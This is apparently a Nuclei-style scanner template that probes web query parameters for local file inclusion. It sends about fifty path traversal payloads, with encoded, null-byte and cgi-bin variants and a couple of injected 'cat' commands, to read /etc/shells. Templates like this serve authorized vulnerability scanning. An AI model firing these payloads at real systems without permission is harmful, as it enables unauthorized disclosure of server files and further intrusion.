http:
- fuzzing:
  - fuzz:
    - '{{nix_fuzz}}'
    mode: multiple
    part: query
    type: replace
  matchers:
  - condition: and
    part: body
    type: word
    words:
    - '# valid login shells'
    - /bin/sh
    - /bin/ash
    - /bin/bash
  method: GET
  path:
  - '{{BaseURL}}'
  payloads:
    nix_fuzz:
    - /etc/shells
    - ../../etc/shells
    - ../../../etc/shells
    - /../../../../etc/shells
    - ../../../../../../../../../etc/shells
    - ../../../../../../../../etc/shells
    - ../../../../../../../etc/shells
    - ../../../../../../etc/shells
    - ../../../../../etc/shells
    - ../../../../etc/shells
    - ../../../etc/shells
    - ../../../etc/shells%00
    - ../../../../../../../../../../../../etc/shells%00
    - ../../../../../../../../../../../../etc/shells
    - /../../../../../../../../../../etc/shells^^
    - /../../../../../../../../../../etc/shells
    - /./././././././././././etc/shells
    - \..\..\..\..\..\..\..\..\..\..\etc\shells
    - ..\..\..\..\..\..\..\..\..\..\etc\shells
    - /..\../..\../..\../..\../..\../..\../etc/shells
    - .\\./.\\./.\\./.\\./.\\./.\\./etc/shells
    - \..\..\..\..\..\..\..\..\..\..\etc\shells%00
    - ..\..\..\..\..\..\..\..\..\..\etc\shells%00
    - '%252e%252e%252fetc%252fshells'
    - '%252e%252e%252fetc%252fshells%00'
    - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells'
    - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shells%00'
    - '....//....//etc/shells'
    - ..///////..////..//////etc/shells
    - /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/shells
    - '%0a/bin/cat%20/etc/shells'
    - '%00/etc/shells%00'
    - '%00../../../../../../etc/shells'
    - /../../../../../../../../../../../etc/shells%00.jpg
    - /../../../../../../../../../../../etc/shells%00.html
    - /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shells
    - /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells
    - \\&apos;/bin/cat%20/etc/shells\\&apos;
    - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells
    - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells
    - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells
    - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shells
    - /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells
    - /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells
    - /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells
    - /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/shells
  stop-at-first-match: true
id: lfi-fuzz-14
info:
  author: 0x71rex
  name: Local File Inclusion
  severity: high
  tags: lfi,dast,linux
